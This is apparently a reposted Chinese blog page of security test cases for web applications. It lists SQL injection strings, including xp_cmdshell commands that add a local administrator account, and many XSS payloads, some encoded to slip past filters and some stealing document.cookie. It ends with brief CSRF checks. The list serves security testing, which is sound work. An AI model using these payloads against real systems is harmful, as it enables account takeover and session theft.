2. 程式人生 > >常用安全測試用例(二)

常用安全測試用例(二)

阿新 發佈:2018-11-30

防止SQL注入

Admin--

‘or ­­­--­­

‘ and ( ) exec insert * % chr mid

and 1=1 ; And 1=1 ; aNd 1=1 ; char(97)char(110)char(100) char(49)char(61)char(49) ; %20AND%201=2

‘and 1=1 ; ‘And 1=1 ; ‘aNd 1=1 ;

and 1=2 ; ‘and 1=2

and 2=2

and user>0

and (select count(*) from sysobjects)>0

and (select count(*) from msysobjects)>0

and (Select Count(*) from Admin)>=0

and (select top 1 len(username) from Admin)>0(username 已知欄位)

;exec master..xp_cmdshell “net user name password /add”—

;exec master..xp_cmdshell “net localgroup name administrators /add”—

and 0<>(select count(*) from admin)

簡單的如where xtype=’U’,字元U對應的ASCII碼是85,所以可以用where xtype=char(85)代替;如果字元是中文的,比如where name=’使用者’,可以用where name=nchar(29992)+nchar(25143)代替。

跨站指令碼攻擊(XSS)

對於 XSS,只需檢查 HTML 輸出並看看您輸入的內容在什麼地方。它在一個 HREF 標記中嗎?是否在 IFRAME 標記中?它在 CLSID 標記中嗎?在 IMG SRC 中嗎?某些 Flash 內容的 PARAM NAME 是怎樣的?

[email protected]#$%^&*()_+<>,./?;'"[]{}\-

★%3Cinput /%3E

★%3Cscript%3Ealert('XSS')%3C/script%3E

★<input type="text"/>

★<input/>

★<input/

★<script>alert('xss')</script>

★<script>alert('xss');</script>

★</script><script>alert(‘xss’)</script>

★javascript:alert(/xss/)

★javascrip&#116&#58alert(/xss/)

★<img src="#" onerror=alert(/xss/)>

★<img src="#" style="Xss:expression(alert(/xss/));">

★<img src="#"/**/onerror=alert(/xss/) width=100>

★=’><script>alert(document.cookie)</script>

★1.jpg" onmouseover="alert('xss')

★"></a><script>alert(‘xss’);</script>

★http://xxx';alert('xss');var/ a='a

★’”>xss&<

★"onmouseover=alert('hello');"

★&{alert('hello');}

★>"'><script>alert(‘XSS')</script>

★>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>

★>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>

★AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22

★%22%2Balert(%27XSS%27)%2B%22

★<table background="javascript:alert(([code])"></table>

★<object type=text/html data="javascript:alert(([code]);"></object>

★<body onload="javascript:alert(([code])"></body>

★a?<script>alert(’Vulnerable’)</script>

★<!--'">&:

var from = ‘$!rundata.Parameters.getString(’from’)';

  var from = ”;hackerFunction(document.cookie);”;

http://searchbox.mapbar.com/publish/template/template1010 /?CID=qingke&tid=tid1010&cityName=天津<script> alert("hello")</script>&nid=MAPBXITBJRQMYWJRXPCBX

跨站請求偽造(CSRF)

同個瀏覽器開啟兩個頁面,一個頁面許可權失效後,另一個頁面是否可操作成功。

當頁面沒有CHECKCODE時,檢視頁面原始碼,查是是否有token。如果頁面完全是展示頁面,是不會有token的。

相關推薦

常用安全測試()

防止SQL注入 Admin-- ‘or ­­­--­­ ‘ and ( ) exec insert * % chr mid and 1=1 ; And 1=1 ; aNd 1=1 ; char(97)char(110)char(100) char(49)char(61)char(49) ; %20AN

常用功能測試設計

登入 1.輸入已註冊的使用者名稱和正確的密碼,驗證是否登入成功; 2.輸入已註冊的使用者名稱和不正確的密碼,驗證是否登入失敗,並且提示資訊正確; 3.輸入未註冊的使用者名稱和任意密碼,驗證是否登入失敗,並且提示資訊正確; 4.使用者名稱和密碼兩者都為空,驗證是否登入失敗,並且提示資訊正確; 5.

測試常用方法 測試常用方法

測試用例的常用方法 1 等價類劃分法  2 邊界值法 3 因果圖及判定表法 4 正交表 5 測試大綱法 6 場景法 7 錯誤推斷法 8 隨機測試 9 需求文件轉化法   1、等價類劃分法   應用場合:介

黑盒測試設計-維護(十

叠代 測試的 部分 開發 用例設計 來源 nbsp 延伸 不同的 六、用例維護—經驗用例 當進入執行測試階段時, 我們總是能發現一些缺陷的出現是出乎我們意料的, 或者說是已有的測試需求和測試用例未能覆蓋的。那麽,對於這部分缺陷,也應當在分析整理後添加到測試需求

測試常用方法

需求 最大 style 產生 require only 互斥 輸出 無法 1、等價類劃分法 應用場合:界面中只要有數據輸入的地方,就可以使用等價類劃分法。從無窮多的數據中,挑選少量代表數據進行測試。 1)分析需求,劃分等價類:有效等價類和無效等價類 2)從每個等價類

使用jmeter+ant進行接口自動化測試(數據驅動)之:利用apache-ant執行測試並生成HTML格式測試報告

extras true -c 註釋符 www 文件的 介紹 ntc encoding 在 使用jmeter+ant進行接口自動化測試(數據驅動)之一 介紹了如何使用csv文件來批量管理接口 本次接著介紹如何利用apache-ant執行測試用例並生成HTML格式測試報告 ①下

測試

ava width nbsp 退出 註入攻擊 做到 httponly 用例 大量 2018-08-20 09:08:12 登錄 1)空白 用戶名和密碼均為空/用戶名填寫,密碼為空/用戶名為空,密碼填寫 2)錯誤校驗 輸入錯誤的用戶名和密碼

黑盒測試設計

因果圖法 一. 方法簡介 1.定義 是一種利用圖解法分析輸入的各種組合情況,從而設計測試用例的方法,它適合於檢查程式輸入條件的各種組合情況。 2.因果圖法產生的背景 等價類劃分法和邊界值分析方法都是著重考慮輸入條件,但沒有考慮輸入條件的各種組合、輸入條件之間的相互制約

軟體測試測試常用的設計方法分析

一、場景法      官方:通過運用場景法對系統的功能點或業務流程描述,從而提高測試效果。場景法一般包含基本流和備選流,從一個流程開始,通過描述經過的路徑來確定的過程,經過遍歷所有的基本流和備用流來完成整個場景。     個人總結:設計

常用輸入框的測試彙總

針對普通輸入框的測試用例 1、 輸入中英文空格,字串中間空格,首尾空格,回車換行符 2、 字元長度校驗,輸入是緩衝區溢位的超長字元,預設字元,空字元,特殊字元,尤其是系統保留字元 3、 根據的頁面使用的不同程式語言,輸入不同的語言字串,如HTML格式語言,JS函式格式,如 <br

#資料結構與演算法學習筆記#劍指Offer35:是否平衡叉樹/AVL樹 + 測試(Java、C/C++)

2018.11.3 前幾天有用遞迴實現了二叉樹的深度#資料結構與演算法學習筆記#劍指Offer36:二叉樹的深度(Java),因此可以對每個結點先序遍歷進行一次平衡驗證,只要確定每個結點都是平衡的

Appium+java+Android(uiautomatorviewer定位手機頁面元素+Java編寫自動化測試)

uiautomatorviewer定位手機頁面元素+編寫自動化測試用例 如何安裝及搭建appium的環境請參考我的上篇部落格appium+java+Android環境搭建 uiautomatorviewer工具是用來給手機頁面元素定位的,所以在使用uiautomatorviewer之前,

【Katalon學習十九】測試套件和測試的設定/拆卸

測試套件和測試用例的設定/拆卸(5.3以上版本支援) 有關Katalon Studio中測試的完整生命週期,請參閱此文件。 現在,您的專案中的每個測試套件都具備了執行SetUp或Teardown方法的能力,這些方法是您自己在執行測試套件之前或之後定義的測試步驟組。這個特性是除了Test Li

軟體安全測試測試格式參考

    軟體測試過程中,功能測試及效能測試的測試用例一般比較多,但安全測試的用例就少一些,這是我日常工作中整理的安全測試用例的樣例,與大家分享探討。軟體安全測試做的比較多的有三種類型:原始碼靜態掃描(

WEB常用測試—文字輸入框

對於普通的文字輸入框,通常要檢查以下幾點:   1. 中英文空格   2. 字串首尾含空格   3. 字串中間含空格   4. 字母   5. 數字   6. 中文   7. 特殊字元   8. null/NULL   9. 超長字元   10. html格式字串   對於費用類

軟體測試 實驗() 測試的設計

一、實驗目的: 通過實驗,理解測試用例設計含義,掌握黑盒測試技術。 二、實驗要求和內容: 年、月、日分別以Y、M和D來儲存相應的值,現在要測試NextData(Y,M,D)函式,用判定表和正交試驗法來設計相應的測試用例。 三、實驗步驟 1、理解

劍指offer面試題:求叉樹的映象(遞迴、迴圈解法及測試

題目:給定二叉樹,將其變換為源二叉樹的映象。 二叉樹的定義如下: struct TreeNode {     int val;     TreeNode* left;     TreeNode* right; }; 輸入描述: 二叉樹的映象定義:     源二叉樹    

常用模組的測試(登入,新增,刪除,查詢)

1、登入 ①使用者名稱和密碼都符合要求(格式上的要求) ②使用者名稱和密碼都不符合要求(格式上的要求) ③使用者名稱符合要求,密碼不符合要求(格式上的要求) ④密碼符合要求,使用者名稱不符合要求(格

軟體測試常用七大方法

第一:測試用例格式包括十大特點用例編號測試項測試標題用例屬性重要級別:高中低預置條件測試輸入操作步驟預期結果實際結果第二:等價類1,等價類定義2,等價類劃分3,等價類劃分規則4,進行等價類用例設計5,案例加以說明第三:邊界值1,邊界值的三點2,邊界值應用場景3,邊界值方法應用

go test 測試那些事() mock

關於`go`的單元測試,之前有寫過一篇帖子[go test測試用例那些事](https://www.cnblogs.com/li-peng/p/10036468.html),但是沒有說go官方的庫[mock](https://github.com/golang/mock),很有必要單獨說一下這個庫,和他的實現